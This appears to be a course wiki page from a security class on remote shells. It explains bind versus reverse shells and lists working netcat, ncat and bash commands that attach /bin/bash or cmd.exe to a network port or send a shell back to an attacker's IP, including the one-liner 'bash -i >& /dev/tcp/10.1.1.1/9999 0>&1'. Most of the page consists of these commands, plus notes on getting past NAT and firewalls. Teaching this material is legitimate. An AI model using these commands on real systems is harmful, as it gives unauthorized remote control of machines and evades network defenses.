Remote Shells - Paiet/SEC-335 GitHub Wiki
- Shells
- BIND vs Reverse shells
- Using netcat to connect a shell
- Set up a listener
- Connect to a listening service
- Creating a BIND shell (the target listens with a shell attached; the attacker connects in)
- LINUX
nc -nlvp 9999 -e /bin/bash
- WIN32
nc -nlvp 9999 -e cmd.exe
- Needs a netcat built with -e (ncat, nc.traditional); the OpenBSD nc that Debian/Ubuntu install as nc has no -e, so these lines fail there
- Creating a Reverse shell (the target connects out to the attacker, which gets through NAT and most outbound firewall rules)
- First: Set up a listener on the attacker box (10.1.1.2 below)
nc -nlvp 9999
- Then the target connects to the listener, "shoveling" a shell back
- LINUX
nc -nv 10.1.1.2 9999 -e /bin/bash
- WIN32
nc -nv 10.1.1.2 9999 -e cmd.exe
- Add security with ncat (the netcat from the Nmap project)
- Works much like nc: same listen/connect/exec model, --exec in place of -e
- Even works WITH nc on the other end, as long as --ssl is not used
- BIND
- Set up BIND listener (on the target)
ncat --exec cmd.exe -vnl 9999
- connect to listener (from the attacker, with ncat or plain nc)
- REVERSE
- Set up a listener (on the attacker, 10.1.1.1 below)
- Client shovels shell to listener
ncat --exec cmd.exe 10.1.1.1 9999
- Able to "whitelist" connections (source-IP filtering only, so it is not authentication)
ncat --exec cmd.exe --allow 10.1.1.2 -vnl 9999
- Able to encrypt sessions (the documented flag is --ssl; the connecting side must pass --ssl too, and without --ssl-verify the session is encrypted but the peer is not authenticated)
ncat --exec cmd.exe --allow 10.1.1.2 -vnl 9999 --ssl
- Doesn't work with nc if using encryption; both ends must be ncat
- BASH Reverse Shell (no netcat needed; /dev/tcp/HOST/PORT is a bash feature, so run it under bash, not /bin/sh; >& sends stdout and stderr to the socket and 0>&1 then reads stdin from it)
bash -i >& /dev/tcp/10.1.1.1/9999 0>&1